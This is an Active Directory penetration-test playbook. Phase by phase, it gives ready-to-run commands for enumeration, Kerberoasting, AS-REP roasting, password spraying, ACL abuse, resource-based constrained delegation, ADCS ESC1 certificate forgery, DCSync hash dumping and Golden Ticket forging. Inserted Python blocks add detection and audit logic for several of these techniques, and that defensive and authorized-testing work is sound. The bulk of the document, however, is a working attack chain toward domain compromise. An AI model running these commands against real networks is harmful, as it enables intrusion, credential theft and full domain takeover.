Playbook: Active Directory Penetration Test

Scope: Full AD domain; assume domain user foothold
Prerequisites: Domain user credentials or shell on domain-joined host; BloodHound.py; Impacket; Rubeus
MITRE Coverage: T1558.003, T1550.002, T1550.003, T1484, T1484.001, T1078.002

Objective

Achieve Domain Admin (and ideally Enterprise Admin / forest-wide compromise), then demonstrate impact on crown jewels. Map the full attack path.

Steps

Phase 1: Initial Enumeration

# Identify domain info
nxc smb dc01 -u user -p pass --pass-pol
nxc smb dc01 -u user -p pass --users | tee domain_users.txt
nxc smb dc01 -u user -p pass --groups

# LDAP dump
ldapdomaindump -u 'domain\user' -p pass dc01 -o ldapdump/

# BloodHound full collection
bloodhound-python -u user -p pass -d domain.local -dc dc01.domain.local -c All -o bh/

Phase 2: Quick Wins Checklist

# Kerberoastable accounts (SPN set, potentially crackable)
GetUserSPNs.py domain.local/user:pass -dc-ip dc01 -request -outputfile krb.txt
hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule

# AS-REP Roastable (no preauth)
GetNPUsers.py domain.local/user:pass -dc-ip dc01 -request -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# Password spraying (verify lockout threshold first)
nxc smb dc01 -u domain_users.txt -p 'Company2024!' --continue-on-success

# Check for local admin across all hosts
nxc smb 10.10.10.0/24 -u user -p pass --local-groups Administrators

# Enumerate ADCS (certificate services — extremely common misconfig)
certipy find -u user@domain.local -p pass -dc-ip dc01 -stdout | grep -E "ESC[0-9]"
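The defender's counterpart to these quick wins, as an added example that is not part of the playbook: detection logic for Kerberoasting, AS-REP roasting and password spraying run over constructed Security events 4769/4768/4771 (the record layout, thresholds and sample values are assumptions).

```python
from collections import defaultdict

# Constructed sample events (not real logs); fields mirror the named XML
# fields of Security events 4769, 4768 and 4771 as an assumption.
EVENTS = [
    {"id": 4769, "user": "jdoe", "service": "MSSQLSvc/sql01", "etype": "0x17", "ip": "10.10.10.5"},
    {"id": 4769, "user": "jdoe", "service": "http/web01", "etype": "0x17", "ip": "10.10.10.5"},
    {"id": 4769, "user": "jdoe", "service": "cifs/fs01", "etype": "0x17", "ip": "10.10.10.5"},
    {"id": 4769, "user": "alice", "service": "cifs/fs01", "etype": "0x12", "ip": "10.10.10.9"},
    {"id": 4768, "user": "svc_backup", "preauth": "0", "etype": "0x17", "ip": "10.10.10.5"},
    {"id": 4768, "user": "alice", "preauth": "2", "etype": "0x12", "ip": "10.10.10.9"},
    {"id": 4771, "user": "bob", "status": "0x18", "ip": "10.10.10.5"},
    {"id": 4771, "user": "carol", "status": "0x18", "ip": "10.10.10.5"},
    {"id": 4771, "user": "dave", "status": "0x18", "ip": "10.10.10.5"},
    {"id": 4771, "user": "alice", "status": "0x18", "ip": "10.10.10.9"},
]
RC4 = "0x17"   # TicketEncryptionType 0x17 = RC4-HMAC, the type the hashcat modes above crack

def detect_kerberoast(events, min_spns=3):
    """One account pulling RC4 service tickets for many distinct (non-computer) SPNs."""
    spns = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4 and not e["service"].endswith("$"):
            spns[e["user"]].add(e["service"])
    return {u: sorted(s) for u, s in spns.items() if len(s) >= min_spns}

def detect_asrep_roast(events):
    """TGT issued with PreAuthType 0 (no pre-authentication) and an RC4 ticket."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == "0" and e["etype"] == RC4})

def detect_spray(events, min_users=3):
    """One source failing Kerberos pre-auth (4771, status 0x18 = bad password) for many users."""
    users = defaultdict(set)
    for e in events:
        if e["id"] == 4771 and e.get("status") == "0x18":
            users[e["ip"]].add(e["user"])
    return {ip: sorted(u) for ip, u in users.items() if len(u) >= min_users}

if __name__ == "__main__":
    print(detect_kerberoast(EVENTS), detect_asrep_roast(EVENTS), detect_spray(EVENTS))
```

Tune the thresholds to the environment's baseline; service accounts with legitimately many SPN requests and shared NAT egress addresses are the usual false-positive sources.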

Phase 3: BloodHound Attack Path Analysis

  1. Import collection zip into BloodHound.
  2. Mark owned accounts as “Owned.”
  3. Run: “Shortest Paths from Owned Principals to Domain Admins.”
  4. Identify viable paths (ACL abuse, group membership, session hijacking, delegation).
  5. Prioritize by ease: GenericAll > WriteDACL > ForceChangePassword > HasSession.

Phase 4: ACL Abuse

# If GenericAll/GenericWrite over a user → reset their password
net user victimuser NewPass123! /domain
# Or with PowerView:
Set-DomainUserPassword -Identity victimuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# If GenericAll over a group → add yourself
net group "IT Admins" attackeruser /add /domain
Add-DomainGroupMember -Identity "IT Admins" -Members attacker

# If WriteDACL over domain object → grant DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync

Phase 5: Delegation Attacks

# Unconstrained delegation computers (except DCs)
# If compromised: capture TGTs of connecting users via SpoolSample/PetitPotam
# Wait for DC to connect (or force with PrinterBug)
Rubeus.exe monitor /interval:5 /nowrap   # Capture incoming TGTs

# RBCD (Resource-Based Constrained Delegation) — if you have write to computer object
# Step 1: Create fake computer
impacket-addcomputer domain.local/user:pass -computer-name FakePC -computer-pass FakePass123
# Step 2: Set RBCD — allow FakePC to delegate to target
rbcd.py -delegate-from FakePC -delegate-to TargetPC domain.local/user:pass -dc-ip dc01 -action write
# Step 3: Get TGS impersonating DA
getST.py domain.local/FakePC\$:FakePass123 -spn cifs/TargetPC.domain.local -impersonate Administrator -dc-ip dc01
KRB5CCNAME=Administrator.ccache wmiexec.py -k -no-pass domain.local/Administrator@TargetPC.domain.local

Phase 6: ADCS Exploitation

# ESC1: SAN in template, enrollee can specify — forge cert as any user
certipy req -u user@domain.local -p pass -ca 'DOMAIN-CA' -template 'VulnerableTemplate' -upn administrator@domain.local
certipy auth -pfx administrator.pfx -domain domain.local -dc-ip dc01
# Returns NTLM hash and TGT for administrator
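An added audit check, not certipy's code, that applies the ESC1 conditions described above to constructed template records (the field names and sample templates are assumptions; in practice they are populated from `certipy find` output).

```python
# ESC1 conditions as an audit, over constructed template records (field names and
# values are assumptions; populate them from `certipy find` output in practice).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers"}

TEMPLATES = [
    {"name": "VulnerableTemplate", "enabled": True, "flags": {"ENROLLEE_SUPPLIES_SUBJECT"},
     "ekus": {"Client Authentication"}, "manager_approval": False,
     "authorized_signatures": 0, "enrollment_rights": {"Domain Users", "Domain Admins"}},
    {"name": "WebServer", "enabled": True, "flags": {"ENROLLEE_SUPPLIES_SUBJECT"},
     "ekus": {"Server Authentication"}, "manager_approval": False,
     "authorized_signatures": 0, "enrollment_rights": {"Domain Users"}},
    {"name": "User", "enabled": True, "flags": set(),
     "ekus": {"Client Authentication"}, "manager_approval": False,
     "authorized_signatures": 0, "enrollment_rights": {"Domain Users"}},
    {"name": "AdminOnly", "enabled": True, "flags": {"ENROLLEE_SUPPLIES_SUBJECT"},
     "ekus": {"Client Authentication"}, "manager_approval": True,
     "authorized_signatures": 0, "enrollment_rights": {"Domain Users"}},
]

def esc1_reasons(t):
    """ESC1 conditions the template does NOT meet; an empty list means it is exposed."""
    missing = []
    if not t["enabled"]:
        missing.append("not published on a CA")
    if "ENROLLEE_SUPPLIES_SUBJECT" not in t["flags"]:
        missing.append("subject/SAN not enrollee-supplied")
    if t["ekus"] and not (t["ekus"] & AUTH_EKUS):   # an empty EKU set imposes no restriction
        missing.append("no authentication EKU")
    if t["manager_approval"] or t["authorized_signatures"] > 0:
        missing.append("manager approval or signature required")
    if not (t["enrollment_rights"] & LOW_PRIV):
        missing.append("no low-privilege enrollment right")
    return missing

def find_esc1(templates):
    """Names of templates that meet every ESC1 condition."""
    return [t["name"] for t in templates if not esc1_reasons(t)]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], esc1_reasons(t) or "ESC1-EXPOSED")
```

Any template the check flags is fixed by clearing ENROLLEE_SUPPLIES_SUBJECT, requiring manager approval, or removing the low-privilege enrollment right.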

Phase 7: Domain Dominance

# DCSync (requires DA or explicit DCSync ACE)
secretsdump.py domain.local/da_user:pass@dc01.domain.local -just-dc-ntlm
# Get KRBTGT hash for Golden Ticket
secretsdump.py domain.local/da_user:pass@dc01.domain.local -just-dc-user krbtgt

# Golden Ticket
ticketer.py -nthash <krbtgt_ntlm> -domain-sid S-1-5-21-xxx -domain domain.local Administrator
KRB5CCNAME=Administrator.ccache nxc smb dc01 -k --use-kcache

# Or Mimikatz Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:<hash> /ptt
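Added detection example, not part of the playbook, covering the traces Phases 4, 5 and 7 leave in the directory: DCSync (4662 carrying replication control-access rights from a non-DC account), RBCD and domain-root ACL writes (5136) and additions to sensitive groups (4728/4732/4756), run over constructed events; the DC account list, sensitive group list and record layout are assumptions.

```python
# Constructed Security events (not real logs); field names are an assumption.
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}   # DS-Replication-Get-Changes-All
DC_ACCOUNTS = {"DC01$"}           # assumed: the only legitimate replication sources
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "IT Admins"}  # assumed list
DOMAIN_ROOT = "DC=domain,DC=local"
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

EVENTS = [
    {"id": 4662, "subject": "DC01$", "props": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "subject": "attacker", "props": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                                                  "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 5136, "subject": "attacker", "attr": RBCD_ATTR,
     "object": "CN=TargetPC,OU=Servers,DC=domain,DC=local"},
    {"id": 5136, "subject": "attacker", "attr": "nTSecurityDescriptor", "object": DOMAIN_ROOT},
    {"id": 5136, "subject": "helpdesk", "attr": "description",
     "object": "CN=jdoe,CN=Users,DC=domain,DC=local"},
    {"id": 4728, "subject": "attacker", "member": "attackeruser", "group": "IT Admins"},
    {"id": 4728, "subject": "hr_admin", "member": "newhire", "group": "HR Staff"},
]

def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """4662 carrying replication control-access rights from a non-DC principal."""
    return [e["subject"] for e in events
            if e["id"] == 4662 and e["subject"] not in dc_accounts
            and REPL_GUIDS & set(e["props"])]

def detect_directory_changes(events):
    """5136 writes to the RBCD attribute, or to the domain root's security descriptor."""
    hits = []
    for e in events:
        if e["id"] != 5136:
            continue
        if e["attr"] == RBCD_ATTR:
            hits.append(("rbcd", e["subject"], e["object"]))
        elif e["attr"] == "nTSecurityDescriptor" and e["object"] == DOMAIN_ROOT:
            hits.append(("domain-acl", e["subject"], e["object"]))
    return hits

def detect_group_adds(events):
    """4728/4732/4756: a member added to one of the sensitive groups."""
    return [(e["subject"], e["member"], e["group"]) for e in events
            if e["id"] in (4728, 4732, 4756) and e["group"] in SENSITIVE_GROUPS]

if __name__ == "__main__":
    for name, f in [("dcsync", detect_dcsync), ("dir", detect_directory_changes),
                    ("groups", detect_group_adds)]:
        print(name, f(EVENTS))
```

5136 only fires when a SACL for Write on the relevant objects is in place, so the directory-change checks depend on directory service change auditing being enabled on the domain root and on computer objects.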

Phase 8: Document & Impact

  1. Capture screenshots of every privilege escalation step.
  2. Access crown jewels: sensitive file shares, databases, email.
  3. Note all domain admin accounts, computer accounts compromised.
  4. Document BloodHound attack path for the report.

Cleanup / Deconfliction

  • Remove added group memberships.
  • Revert ACL changes.
  • Delete fake computer accounts (if RBCD used).
  • Remove Golden Tickets from sessions (kerberos::purge).
  • Communicate critical findings immediately.

Notes & Gotchas

  • Always verify password lockout threshold before spraying (default is often 10 attempts).
  • ADCS ESC attacks require the CA to have the ENROLLEE_SUPPLIES_SUBJECT flag — certipy find shows this.
  • Forest trust attacks require child domain DA first, then ExtraSid abuse to reach parent.
  • Constrained delegation with protocol transition (S4U2Self + S4U2Proxy) allows impersonating any user.